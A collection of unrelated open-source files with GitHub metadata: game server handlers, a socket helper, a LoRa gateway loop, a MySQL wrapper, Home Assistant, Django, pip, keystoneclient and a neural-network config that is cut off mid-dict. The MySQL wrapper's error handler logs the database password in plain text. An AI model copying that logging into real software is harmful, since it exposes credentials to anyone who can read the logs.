def create(self, pattern):
return pattern
class RepeatedPatterns(Patterns):
def __init__(self, song, hold=None, patterns=None):
self.hold = hold
super().__init__(song, patterns=patterns)
def create(self, pattern):
return Repeatedly(pattern, hold=self.hold)
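# Minimal usage sketch (assumes a `song` factory object as passed by the
# caller; the "|" characters in a pattern string are decorative and are
# stripped by _save() above):
#
#     specs = EndlessPatterns(song, patterns=dict(verse="1 4 5 | 1 4 5"))
#     specs.as_dict()  # -> {'verse': Endlessly(['1', '4', '5', '1', '4', '5'])}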
|
{
"content_hash": "3bf179a6d11b773d589f1f6d8626673e",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 72,
"avg_line_length": 28.680555555555557,
"alnum_prop": 0.6779661016949152,
"repo_name": "mpdehaan/camp",
"id": "e6a1d067b7a30a5ef4c1339502ffcc30e5f44580",
"size": "2065",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "camp/tracker/patterns.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "224"
},
{
"name": "Python",
"bytes": "124099"
}
],
"symlink_target": ""
}
|
"""2014_托管通知接口"""
import clr, sys
from action import *
from lang import Lang
clr.AddReference('ZyGames.Framework.Game')
clr.AddReference('ZyGames.Doudizhu.Lang')
clr.AddReference('ZyGames.Doudizhu.Model')
clr.AddReference('ZyGames.Doudizhu.Bll')
from ZyGames.Framework.Game.Service import *
from ZyGames.Doudizhu.Lang import *
from ZyGames.Doudizhu.Model import *
from ZyGames.Doudizhu.Bll.Logic import *
class UrlParam(HttpParam):
def __init__(self):
HttpParam.__init__(self)
class ActionResult(DataResult):
def __init__(self):
DataResult.__init__(self)
self.UserId = 0
self.Status = 0
def getUrlElement(httpGet, parent):
urlParam = UrlParam()
if httpGet.Contains("Status"):
urlParam.Status = httpGet.GetByteValue("Status")
else:
urlParam.Result = False
return urlParam
def takeAction(urlParam, parent):
actionResult = ActionResult()
user = parent.Current.User
if not user:
parent.ErrorCode = Lang.getLang("ErrorCode")
parent.ErrorInfo = Lang.getLang("LoadError")
actionResult.Result = False
return actionResult
actionResult.UserId = user.UserId
actionResult.Status = urlParam.Status
return actionResult
def buildPacket(writer, urlParam, actionResult):
writer.PushIntoStack(actionResult.UserId)
writer.PushByteIntoStack(actionResult.Status)
return True
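# Illustrative round trip (values hypothetical, shapes taken from the
# handlers above): a request carrying Status=1 passes getUrlElement(), and
# buildPacket() answers with UserId pushed as an int followed by Status
# pushed as a byte.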
|
{
"content_hash": "c56b3a0c51e00c3929bd2652bb4e7a8f",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 56,
"avg_line_length": 29.571428571428573,
"alnum_prop": 0.6846100759144237,
"repo_name": "wenhulove333/ScutServer",
"id": "0de2699d7be96a66fbdf56c230e595938b5017be",
"size": "1463",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "Sample/Doudizhu/Server/release/PyScript/Action/Action2014.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ASP",
"bytes": "150472"
},
{
"name": "ActionScript",
"bytes": "339184"
},
{
"name": "Batchfile",
"bytes": "60466"
},
{
"name": "C",
"bytes": "3976261"
},
{
"name": "C#",
"bytes": "9481083"
},
{
"name": "C++",
"bytes": "11640198"
},
{
"name": "CMake",
"bytes": "489"
},
{
"name": "CSS",
"bytes": "13478"
},
{
"name": "Groff",
"bytes": "16179"
},
{
"name": "HTML",
"bytes": "283997"
},
{
"name": "Inno Setup",
"bytes": "28931"
},
{
"name": "Java",
"bytes": "214263"
},
{
"name": "JavaScript",
"bytes": "2809"
},
{
"name": "Lua",
"bytes": "4667522"
},
{
"name": "Makefile",
"bytes": "166623"
},
{
"name": "Objective-C",
"bytes": "401654"
},
{
"name": "Objective-C++",
"bytes": "355347"
},
{
"name": "Python",
"bytes": "1633926"
},
{
"name": "Shell",
"bytes": "101770"
},
{
"name": "Visual Basic",
"bytes": "18764"
}
],
"symlink_target": ""
}
|
import socket
def netcat(hostname, port, content):
data = ""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((hostname, port))
s.sendall(content)
s.shutdown(socket.SHUT_WR)
while 1:
buff = s.recv(1024)
if buff == "":
break
else:
data += buff
s.close()
return data
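# Illustrative usage (hypothetical endpoint; assumes a line-oriented TCP
# service). netcat() sends the payload, half-closes the socket, then drains
# the response until EOF:
#
#     banner = netcat("127.0.0.1", 2181, "ruok")
#     print(banner)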
|
{
"content_hash": "b3dddb2a2274860bf1d518c92fbf5e7b",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 57,
"avg_line_length": 22.625,
"alnum_prop": 0.5497237569060773,
"repo_name": "keedio/nagios-hadoop",
"id": "7f8d0f561b31569e15e0a276370852e80a283a3f",
"size": "1260",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "netcat.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "78099"
},
{
"name": "Shell",
"bytes": "8589"
}
],
"symlink_target": ""
}
|
import serial
import time
import json
#ser = serial.Serial("/dev/ttyS0", 9600)
ser = serial.Serial("/dev/ttyS0", 9600, timeout=0.2)
def main():
while True:
        # Wait for a LoRa module message on the UART port.
count = ser.inWaiting()
if count != 0:
            recv = ser.readline()  # readline() needs a timeout set, otherwise it blocks
ser.flushInput()
print(recv)
json_lora = json.loads(recv)
#Parse JSON
#print(json_lora.get("ID"))
#print(json_lora["ID"])
#if json_lora.get("ID") == '1' : #Device ID-1 existed in gateway database
if int(json_lora.get("ID")) == 1 : #Device ID-1 existed in gateway database
if json_lora.get("CMD") == 'Online':
response = '{"ID":"1", "CMD":"Online", "TYPE":"Light2", "VALUE":"On"}'
print(response)
ser.write(response)
elif json_lora.get("CMD") == 'Env':
if json_lora.get("TYPE") == 'moisture':
if int(json_lora.get("VALUE")) < 2000: # soil moisture is lower than standard
response = '{"ID":"1", "CMD":"irrigate", "TYPE":"Open", "VALUE":"100"}'
ser.write(response)
else:
print('init_device')
#init_device() #Create sqlite table for device 1.
time.sleep(0.1)
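# Example of an uplink frame this loop expects on the serial port (field
# values hypothetical; the keys match the json_lora lookups above):
#
#     {"ID": "1", "CMD": "Env", "TYPE": "moisture", "VALUE": "1500"}
#
# A moisture VALUE below 2000 triggers the irrigate response above.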
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
if ser != None:
ser.close()
|
{
"content_hash": "dc7a430c62833e21d29c98ccc6267092",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 95,
"avg_line_length": 39.61538461538461,
"alnum_prop": 0.5106796116504855,
"repo_name": "Python-IoT/Smart-IoT-Planting-System",
"id": "36d04491476caf8aed0553c4c8fd5511d0acfbd5",
"size": "2298",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "gateway/src/main_bk.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "PLpgSQL",
"bytes": "563"
},
{
"name": "Python",
"bytes": "56858"
},
{
"name": "Shell",
"bytes": "2897"
}
],
"symlink_target": ""
}
|
import logging
import pymysql
LOG = logging.getLogger(__name__)
class _ConnectionWrapper(object):
def __init__(self, database_settings):
self._settings = database_settings
try:
self._conn = pymysql.connect(
host=database_settings.host,
port=database_settings.port,
user=database_settings.username,
password=database_settings.password,
db=database_settings.database,
cursorclass=pymysql.cursors.DictCursor,
use_unicode=True)
except pymysql.MySQLError as ex:
LOG.error('Failed to connect to connect to MySQL database '
'%s:%d/%s using login "%s" and password "%s": %s',
database_settings.host, database_settings.port,
database_settings.database, database_settings.username,
database_settings.password, ex)
raise
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if (exc_type, exc_val, exc_tb) == (None, None, None):
self._conn.commit()
self._conn.close()
def execute(self, sql, **kwargs):
"""
        Execute an SQL statement without returning a result.
"""
LOG.debug('SQL execute [%s@%s:%d/%s]: %s %r',
self._settings.username, self._settings.host,
self._settings.port, self._settings.database, sql, kwargs)
with self._conn.cursor() as cursor:
cursor.execute(sql, kwargs)
def query(self, sql, **kwargs):
"""
        Execute an SQL query and return all rows. Any values in the SQL query
        of %(name)s format will be replaced by values passed as kwargs.
"""
LOG.debug('SQL query [%s@%s:%d/%s]: %s %r',
self._settings.username, self._settings.host,
self._settings.port, self._settings.database, sql, kwargs)
with self._conn.cursor() as cursor:
cursor.execute(sql, kwargs)
return cursor.fetchall()
def query_one(self, sql, **kwargs):
"""
        Execute an SQL query and return one row. Any values in the SQL query
        of %(name)s format will be replaced by values passed as kwargs.
        It is an error if the query returns more than one row.
"""
LOG.debug('SQL query one [%s@%s:%d/%s]: %s %r',
self._settings.username, self._settings.host,
self._settings.port, self._settings.database, sql, kwargs)
with self._conn.cursor() as cursor:
rowcount = cursor.execute(sql, kwargs)
assert rowcount <= 1
return cursor.fetchone()
def connection(database_settings):
return _ConnectionWrapper(database_settings)
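# Illustrative usage sketch (`settings` stands for any object exposing the
# host/port/username/password/database attributes read above; table and
# column names are hypothetical):
#
#     with connection(settings) as db:
#         row = db.query_one('SELECT id FROM hosts WHERE name = %(n)s', n='x')
#
# Leaving the `with` block without an exception commits the transaction; the
# connection is closed either way (see __exit__ above).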
|
{
"content_hash": "651c989527f2905c921eba7e100bb8ac",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 77,
"avg_line_length": 37.30263157894737,
"alnum_prop": 0.5675485008818342,
"repo_name": "SVilgelm/CloudFerry",
"id": "2c9388ed6c4a202b6260e5a49fc272d7fb76f933",
"size": "3409",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cloudferry/lib/os/cloud_db.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "2615"
},
{
"name": "Python",
"bytes": "1718937"
},
{
"name": "Ruby",
"bytes": "2507"
},
{
"name": "Shell",
"bytes": "11910"
}
],
"symlink_target": ""
}
|
"""Config flow for AirNow integration."""
import logging
from pyairnow import WebServiceAPI
from pyairnow.errors import AirNowError, InvalidKeyError
import voluptuous as vol
from homeassistant import config_entries, core, exceptions
from homeassistant.const import CONF_API_KEY, CONF_LATITUDE, CONF_LONGITUDE, CONF_RADIUS
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
from .const import DOMAIN
_LOGGER = logging.getLogger(__name__)
async def validate_input(hass: core.HomeAssistant, data):
"""
Validate the user input allows us to connect.
Data has the keys from DATA_SCHEMA with values provided by the user.
"""
session = async_get_clientsession(hass)
client = WebServiceAPI(data[CONF_API_KEY], session=session)
lat = data[CONF_LATITUDE]
lng = data[CONF_LONGITUDE]
distance = data[CONF_RADIUS]
# Check that the provided latitude/longitude provide a response
try:
test_data = await client.observations.latLong(lat, lng, distance=distance)
except InvalidKeyError as exc:
raise InvalidAuth from exc
except AirNowError as exc:
raise CannotConnect from exc
if not test_data:
raise InvalidLocation
# Validation Succeeded
return True
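# Illustrative call (coordinates hypothetical; requires a real AirNow API
# key and a running hass instance):
#
#     await validate_input(hass, {
#         CONF_API_KEY: "...",
#         CONF_LATITUDE: 34.05, CONF_LONGITUDE: -118.24, CONF_RADIUS: 150,
#     })
#
# returns True, or raises one of the exceptions mapped to form errors below.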
class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow for AirNow."""
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_CLOUD_POLL
async def async_step_user(self, user_input=None):
"""Handle the initial step."""
errors = {}
if user_input is not None:
# Set a unique id based on latitude/longitude
await self.async_set_unique_id(
f"{user_input[CONF_LATITUDE]}-{user_input[CONF_LONGITUDE]}"
)
self._abort_if_unique_id_configured()
try:
# Validate inputs
await validate_input(self.hass, user_input)
except CannotConnect:
errors["base"] = "cannot_connect"
except InvalidAuth:
errors["base"] = "invalid_auth"
except InvalidLocation:
errors["base"] = "invalid_location"
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Unexpected exception")
errors["base"] = "unknown"
else:
# Create Entry
return self.async_create_entry(
title=f"AirNow Sensor at {user_input[CONF_LATITUDE]}, {user_input[CONF_LONGITUDE]}",
data=user_input,
)
return self.async_show_form(
step_id="user",
data_schema=vol.Schema(
{
vol.Required(CONF_API_KEY): str,
vol.Optional(
CONF_LATITUDE, default=self.hass.config.latitude
): cv.latitude,
vol.Optional(
CONF_LONGITUDE, default=self.hass.config.longitude
): cv.longitude,
vol.Optional(CONF_RADIUS, default=150): int,
}
),
errors=errors,
)
class CannotConnect(exceptions.HomeAssistantError):
"""Error to indicate we cannot connect."""
class InvalidAuth(exceptions.HomeAssistantError):
"""Error to indicate there is invalid auth."""
class InvalidLocation(exceptions.HomeAssistantError):
"""Error to indicate the location is invalid."""
|
{
"content_hash": "b98adb00d8de707f0b54e23a6b54bf39",
"timestamp": "",
"source": "github",
"line_count": 110,
"max_line_length": 104,
"avg_line_length": 32.58181818181818,
"alnum_prop": 0.6124441964285714,
"repo_name": "adrienbrault/home-assistant",
"id": "b4de58808da3610bf5a0f206a4c16d59530bd70c",
"size": "3584",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/airnow/config_flow.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1795"
},
{
"name": "Python",
"bytes": "32021043"
},
{
"name": "Shell",
"bytes": "4900"
}
],
"symlink_target": ""
}
|
from django import forms
class CustomLockdownForm(forms.Form):
"""A form to test the behavior of using custom forms for authentication."""
answer = forms.IntegerField()
def clean_answer(self):
"""Clean the answer field, by checking its value."""
if self.cleaned_data['answer'] == 42:
return 42
raise forms.ValidationError('Wrong answer.')
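# Minimal sketch of how this form validates (hypothetical data, mirroring
# clean_answer() above; requires configured Django settings to run):
#
#     form = CustomLockdownForm(data={'answer': '42'})
#     form.is_valid()   # True: IntegerField cleans '42' -> 42
#     form = CustomLockdownForm(data={'answer': '7'})
#     form.is_valid()   # False: clean_answer() raises ValidationError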
|
{
"content_hash": "b5fdcdfaa3a74ce72b0c5d975c674a56",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 79,
"avg_line_length": 30.076923076923077,
"alnum_prop": 0.6572890025575447,
"repo_name": "Dunedan/django-lockdown",
"id": "885d8775bc0af5cee13cc8c71852ea06148a55b6",
"size": "391",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lockdown/tests/forms.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "537"
},
{
"name": "Python",
"bytes": "48322"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
import collections
import logging
import os
import re
from pip._vendor import six
from pip._vendor.packaging.utils import canonicalize_name
from pip._vendor.pkg_resources import RequirementParseError
from pip._internal.exceptions import BadCommand, InstallationError
from pip._internal.req.constructors import (
install_req_from_editable,
install_req_from_line,
)
from pip._internal.req.req_file import COMMENT_RE
from pip._internal.utils.misc import (
dist_is_editable,
get_installed_distributions,
)
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
if MYPY_CHECK_RUNNING:
from typing import (
Iterator, Optional, List, Container, Set, Dict, Tuple, Iterable, Union
)
from pip._internal.cache import WheelCache
from pip._vendor.pkg_resources import (
Distribution, Requirement
)
RequirementInfo = Tuple[Optional[Union[str, Requirement]], bool, List[str]]
logger = logging.getLogger(__name__)
def freeze(
requirement=None, # type: Optional[List[str]]
find_links=None, # type: Optional[List[str]]
local_only=None, # type: Optional[bool]
user_only=None, # type: Optional[bool]
paths=None, # type: Optional[List[str]]
skip_regex=None, # type: Optional[str]
isolated=False, # type: bool
wheel_cache=None, # type: Optional[WheelCache]
exclude_editable=False, # type: bool
skip=() # type: Container[str]
):
# type: (...) -> Iterator[str]
find_links = find_links or []
skip_match = None
if skip_regex:
skip_match = re.compile(skip_regex).search
for link in find_links:
yield '-f %s' % link
installations = {} # type: Dict[str, FrozenRequirement]
for dist in get_installed_distributions(local_only=local_only,
skip=(),
user_only=user_only,
paths=paths):
try:
req = FrozenRequirement.from_dist(dist)
except RequirementParseError as exc:
# We include dist rather than dist.project_name because the
# dist string includes more information, like the version and
# location. We also include the exception message to aid
# troubleshooting.
logger.warning(
'Could not generate requirement for distribution %r: %s',
dist, exc
)
continue
if exclude_editable and req.editable:
continue
installations[req.canonical_name] = req
if requirement:
# the options that don't get turned into an InstallRequirement
# should only be emitted once, even if the same option is in multiple
# requirements files, so we need to keep track of what has been emitted
# so that we don't emit it again if it's seen again
emitted_options = set() # type: Set[str]
# keep track of which files a requirement is in so that we can
# give an accurate warning if a requirement appears multiple times.
req_files = collections.defaultdict(list) # type: Dict[str, List[str]]
for req_file_path in requirement:
with open(req_file_path) as req_file:
for line in req_file:
if (not line.strip() or
line.strip().startswith('#') or
(skip_match and skip_match(line)) or
line.startswith((
'-r', '--requirement',
'-Z', '--always-unzip',
'-f', '--find-links',
'-i', '--index-url',
'--pre',
'--trusted-host',
'--process-dependency-links',
'--extra-index-url'))):
line = line.rstrip()
if line not in emitted_options:
emitted_options.add(line)
yield line
continue
if line.startswith('-e') or line.startswith('--editable'):
if line.startswith('-e'):
line = line[2:].strip()
else:
line = line[len('--editable'):].strip().lstrip('=')
line_req = install_req_from_editable(
line,
isolated=isolated,
wheel_cache=wheel_cache,
)
else:
line_req = install_req_from_line(
COMMENT_RE.sub('', line).strip(),
isolated=isolated,
wheel_cache=wheel_cache,
)
if not line_req.name:
logger.info(
"Skipping line in requirement file [%s] because "
"it's not clear what it would install: %s",
req_file_path, line.strip(),
)
logger.info(
" (add #egg=PackageName to the URL to avoid"
" this warning)"
)
else:
line_req_canonical_name = canonicalize_name(
line_req.name)
if line_req_canonical_name not in installations:
# either it's not installed, or it is installed
# but has been processed already
if not req_files[line_req.name]:
logger.warning(
"Requirement file [%s] contains %s, but "
"package %r is not installed",
req_file_path,
COMMENT_RE.sub('', line).strip(),
line_req.name
)
else:
req_files[line_req.name].append(req_file_path)
else:
yield str(installations[
line_req_canonical_name]).rstrip()
del installations[line_req_canonical_name]
req_files[line_req.name].append(req_file_path)
# Warn about requirements that were included multiple times (in a
# single requirements file or in different requirements files).
for name, files in six.iteritems(req_files):
if len(files) > 1:
logger.warning("Requirement %s included multiple times [%s]",
name, ', '.join(sorted(set(files))))
    yield (
        '## The following requirements were added by '
        'pip freeze:'
    )
for installation in sorted(
installations.values(), key=lambda x: x.name.lower()):
if installation.canonical_name not in skip:
yield str(installation).rstrip()
def get_requirement_info(dist):
# type: (Distribution) -> RequirementInfo
"""
Compute and return values (req, editable, comments) for use in
FrozenRequirement.from_dist().
"""
if not dist_is_editable(dist):
return (None, False, [])
location = os.path.normcase(os.path.abspath(dist.location))
from pip._internal.vcs import vcs, RemoteNotFoundError
vcs_backend = vcs.get_backend_for_dir(location)
if vcs_backend is None:
req = dist.as_requirement()
logger.debug(
'No VCS found for editable requirement "%s" in: %r', req,
location,
)
comments = [
'# Editable install with no version control ({})'.format(req)
]
return (location, True, comments)
try:
req = vcs_backend.get_src_requirement(location, dist.project_name)
except RemoteNotFoundError:
req = dist.as_requirement()
comments = [
'# Editable {} install with no remote ({})'.format(
type(vcs_backend).__name__, req,
)
]
return (location, True, comments)
except BadCommand:
logger.warning(
'cannot determine version of editable source in %s '
'(%s command not found in path)',
location,
vcs_backend.name,
)
return (None, True, [])
except InstallationError as exc:
logger.warning(
"Error when trying to get requirement for VCS system %s, "
"falling back to uneditable format", exc
)
else:
if req is not None:
return (req, True, [])
logger.warning(
'Could not determine repository location of %s', location
)
comments = ['## !! Could not determine repository location']
return (None, False, comments)
class FrozenRequirement(object):
def __init__(self, name, req, editable, comments=()):
# type: (str, Union[str, Requirement], bool, Iterable[str]) -> None
self.name = name
self.canonical_name = canonicalize_name(name)
self.req = req
self.editable = editable
self.comments = comments
@classmethod
def from_dist(cls, dist):
# type: (Distribution) -> FrozenRequirement
req, editable, comments = get_requirement_info(dist)
if req is None:
req = dist.as_requirement()
return cls(dist.project_name, req, editable, comments=comments)
def __str__(self):
req = self.req
if self.editable:
req = '-e %s' % req
return '\n'.join(list(self.comments) + [str(req)]) + '\n'
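# Illustrative call of the generator above (internal pip API, so the exact
# signature may differ between releases; values hypothetical):
#
#     for line in freeze(local_only=True, skip=('pip', 'setuptools')):
#         print(line)
#
# emits one "name==version" (or "-e <location>") line per distribution.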
|
{
"content_hash": "8fa1c4f1e53bbee5e4688eecdfbdcef4",
"timestamp": "",
"source": "github",
"line_count": 261,
"max_line_length": 79,
"avg_line_length": 38.475095785440615,
"alnum_prop": 0.5140410276837284,
"repo_name": "kenxwagner/PythonPlay",
"id": "36a5c339a2ab22debec595af17a520a803f2a783",
"size": "10180",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "Project/webscrap/websc/Lib/site-packages/pip/_internal/operations/freeze.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1502"
},
{
"name": "PowerShell",
"bytes": "1755"
},
{
"name": "Python",
"bytes": "2564579"
},
{
"name": "Shell",
"bytes": "3113"
}
],
"symlink_target": ""
}
|
from keystoneclient import base
from keystoneclient import exceptions
from keystoneclient.i18n import _
from keystoneclient.v3 import endpoints
from keystoneclient.v3 import projects
OS_EP_FILTER_EXT = 'OS-EP-FILTER'
class EndpointFilterManager(base.Manager):
"""Manager class for manipulating project-endpoint associations."""
def _build_base_url(self, project=None, endpoint=None):
project_id = base.getid(project)
endpoint_id = base.getid(endpoint)
if project_id and endpoint_id:
            api_path = '/projects/%s/endpoints/%s' % (project_id, endpoint_id)
elif project_id:
api_path = '/projects/%s/endpoints' % (project_id)
elif endpoint_id:
api_path = '/endpoints/%s/projects' % (endpoint_id)
else:
msg = _('Must specify a project, an endpoint, or both')
raise exceptions.ValidationError(msg)
return '/' + OS_EP_FILTER_EXT + api_path
def add_endpoint_to_project(self, project, endpoint):
"""Create a project-endpoint association."""
if not (project and endpoint):
raise ValueError(_('project and endpoint are required'))
base_url = self._build_base_url(project=project,
endpoint=endpoint)
return super(EndpointFilterManager, self)._put(url=base_url)
def delete_endpoint_from_project(self, project, endpoint):
"""Remove a project-endpoint association."""
if not (project and endpoint):
raise ValueError(_('project and endpoint are required'))
base_url = self._build_base_url(project=project,
endpoint=endpoint)
return super(EndpointFilterManager, self)._delete(url=base_url)
def check_endpoint_in_project(self, project, endpoint):
"""Checks if project-endpoint association exist."""
if not (project and endpoint):
raise ValueError(_('project and endpoint are required'))
base_url = self._build_base_url(project=project,
endpoint=endpoint)
return super(EndpointFilterManager, self)._head(url=base_url)
def list_endpoints_for_project(self, project):
"""List all endpoints for a given project."""
if not project:
raise ValueError(_('project is required'))
base_url = self._build_base_url(project=project)
return super(EndpointFilterManager, self)._list(
base_url,
endpoints.EndpointManager.collection_key,
obj_class=endpoints.EndpointManager.resource_class)
def list_projects_for_endpoint(self, endpoint):
"""List all projects for a given endpoint."""
if not endpoint:
raise ValueError(_('endpoint is required'))
base_url = self._build_base_url(endpoint=endpoint)
return super(EndpointFilterManager, self)._list(
base_url,
projects.ProjectManager.collection_key,
obj_class=projects.ProjectManager.resource_class)
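# Illustrative use (the manager is typically reached through an authenticated
# v3 client; the attribute name and the IDs below are assumptions):
#
#     client.endpoint_filter.add_endpoint_to_project('p-123', 'e-456')
#     # -> PUT /OS-EP-FILTER/projects/p-123/endpoints/e-456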
class EndpointGroupFilter(base.Resource):
pass
class EndpointGroupFilterManager(base.CrudManager):
"""Manager class for Endpoint Group Filters."""
resource_class = EndpointGroupFilter
collection_key = 'endpoint_groups'
key = 'endpoint_group'
base_url = OS_EP_FILTER_EXT
def create(self, name, description=None, filters=None, **kwargs):
filters = filters if filters else {}
return super(EndpointGroupFilterManager, self).create(
name=name,
description=description,
filters=filters,
**kwargs)
def get(self, endpoint_group):
return super(EndpointGroupFilterManager, self).get(
endpoint_group_id=base.getid(endpoint_group))
def update(self, endpoint_group, name=None, description=None, filters=None, **kwargs):
return super(EndpointGroupFilterManager, self).update(
endpoint_group_id=base.getid(endpoint_group),
name=name,
description=description,
filters=filters,
**kwargs)
def delete(self, endpoint_group):
return super(EndpointGroupFilterManager, self).delete(
endpoint_group_id=base.getid(endpoint_group))
def list(self, **kwargs):
base_url = self.base_url
return super(EndpointGroupFilterManager, self).list(base_url=base_url, **kwargs)
def _build_base_url(self, project=None, endpoint_group=None):
project_id = base.getid(project)
endpoint_group_id = base.getid(endpoint_group)
if project_id and endpoint_group_id:
api_path = '/endpoint_groups/{0}/projects/{1}'.format(endpoint_group_id,
project_id)
elif project_id:
api_path = '/projects/{0}/endpoint_groups'.format(project_id)
elif endpoint_group_id:
api_path = '/endpoint_groups/{0}/projects'.format(endpoint_group_id)
else:
msg = _('Must specify a project, an endpoint_group, or both')
raise exceptions.ValidationError(msg)
return '/' + OS_EP_FILTER_EXT + api_path
def add_endpoint_group_to_project(self, project, endpoint_group):
"""Create a project-endpoint_group association.
PUT /OS-EP-FILTER/endpoint_groups/{endpoint_group_id}/projects/{project_id}
"""
if not (project and endpoint_group):
raise ValueError(_('project and endpoint_group are required'))
base_url = self._build_base_url(project=project,
endpoint_group=endpoint_group)
return super(EndpointGroupFilterManager, self)._put(url=base_url)
def delete_endpoint_group_from_project(self, project, endpoint_group):
"""Remove a project-endpoint_group association.
DELETE /OS-EP-FILTER/endpoint_groups/{endpoint_group_id}/projects/{project_id}
"""
if not (project and endpoint_group):
raise ValueError(_('project and endpoint_group are required'))
base_url = self._build_base_url(project=project,
endpoint_group=endpoint_group)
return super(EndpointGroupFilterManager, self)._delete(url=base_url)
def check_endpoint_group_in_project(self, project, endpoint_group):
"""Checks if project-endpoint_group association exist.
HEAD /OS-EP-FILTER/endpoint_groups/{endpoint_group_id}/projects/{project_id}
"""
if not (project and endpoint_group):
raise ValueError(_('project and endpoint_group are required'))
base_url = self._build_base_url(project=project,
endpoint_group=endpoint_group)
return super(EndpointGroupFilterManager, self)._head(url=base_url)
def list_endpoint_groups_for_project(self, project):
"""List all endpoints for a given project.
GET /OS-EP-FILTER/projects/{project_id}/endpoint_groups
"""
if not project:
raise ValueError(_('project is required'))
base_url = self._build_base_url(project=project)
return super(EndpointGroupFilterManager, self)._list(
base_url,
self.collection_key,
obj_class=self.resource_class)
|
{
"content_hash": "df4cac7bcae79fa50ccc7935288863c5",
"timestamp": "",
"source": "github",
"line_count": 184,
"max_line_length": 90,
"avg_line_length": 40.108695652173914,
"alnum_prop": 0.6260162601626016,
"repo_name": "ging/python-keystoneclient",
"id": "04e97fa821af1899223821d855d5f7c73151cfe1",
"size": "7993",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "keystoneclient/v3/contrib/endpoint_filter.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1480821"
},
{
"name": "Shell",
"bytes": "7148"
}
],
"symlink_target": ""
}
|
from __future__ import print_function, division
import matplotlib
import logging
from sys import stdout
matplotlib.use('Agg') # Must be before importing matplotlib.pyplot or pylab!
from neuralnilm import (Net, RealApplianceSource,
BLSTMLayer, DimshuffleLayer,
BidirectionalRecurrentLayer)
from neuralnilm.source import standardise, discretize, fdiff, power_and_fdiff
from neuralnilm.experiment import run_experiment, init_experiment
from neuralnilm.net import TrainingError
from neuralnilm.layers import MixtureDensityLayer
from neuralnilm.objectives import (scaled_cost, mdn_nll,
scaled_cost_ignore_inactive, ignore_inactive,
scaled_cost3)
from neuralnilm.plot import MDNPlotter
from lasagne.nonlinearities import sigmoid, rectify, tanh
from lasagne.objectives import mse
from lasagne.init import Uniform, Normal
from lasagne.layers import (LSTMLayer, DenseLayer, Conv1DLayer,
ReshapeLayer, FeaturePoolLayer, RecurrentLayer)
from lasagne.updates import nesterov_momentum, momentum
from functools import partial
import os
import __main__
from copy import deepcopy
from math import sqrt
import numpy as np
import theano.tensor as T
NAME = os.path.splitext(os.path.split(__main__.__file__)[1])[0]
PATH = "/homes/dk3810/workspace/python/neuralnilm/figures"
SAVE_PLOT_INTERVAL = 1000
GRADIENT_STEPS = 100
source_dict = dict(
filename='/data/dk3810/ukdale.h5',
appliances=[
['fridge freezer', 'fridge', 'freezer'],
# 'hair straighteners',
# 'television',
'dish washer',
['washer dryer', 'washing machine']
],
max_appliance_powers=[300, 2500, 2400],
on_power_thresholds=[5] * 5,
max_input_power=5900,
min_on_durations=[60, 1800, 1800],
min_off_durations=[12, 1800, 600],
window=("2013-06-01", "2014-07-01"),
seq_length=512,
output_one_appliance=False,
boolean_targets=False,
train_buildings=[1],
validation_buildings=[1],
skip_probability=0.7,
one_target_per_seq=False,
n_seq_per_batch=16,
subsample_target=2,
include_diff=False,
clip_appliance_power=True,
target_is_prediction=False,
# independently_center_inputs = True,
standardise_input=True,
unit_variance_targets=True,
input_padding=4,
lag=0
# reshape_target_to_2D=True,
# input_stats={'mean': np.array([ 0.05526326], dtype=np.float32),
# 'std': np.array([ 0.12636775], dtype=np.float32)},
# target_stats={
# 'mean': np.array([ 0.04066789, 0.01881946,
# 0.24639061, 0.17608672, 0.10273963],
# dtype=np.float32),
# 'std': np.array([ 0.11449792, 0.07338708,
# 0.26608968, 0.33463112, 0.21250485],
# dtype=np.float32)}
)
N = 50
net_dict = dict(
save_plot_interval=SAVE_PLOT_INTERVAL,
# loss_function=partial(ignore_inactive, loss_func=mdn_nll, seq_length=SEQ_LENGTH),
# loss_function=lambda x, t: mdn_nll(x, t).mean(),
loss_function=lambda x, t: mse(x, t).mean(),
# loss_function=partial(scaled_cost, loss_func=mse),
# loss_function=ignore_inactive,
# loss_function=partial(scaled_cost3, ignore_inactive=False),
updates_func=momentum,
learning_rate=1e-2,
learning_rate_changes_by_iteration={
250: 1e-3
# 500: 1e-3
# 4000: 1e-03,
# 6000: 5e-06,
# 7000: 1e-06
# 2000: 5e-06
# 3000: 1e-05
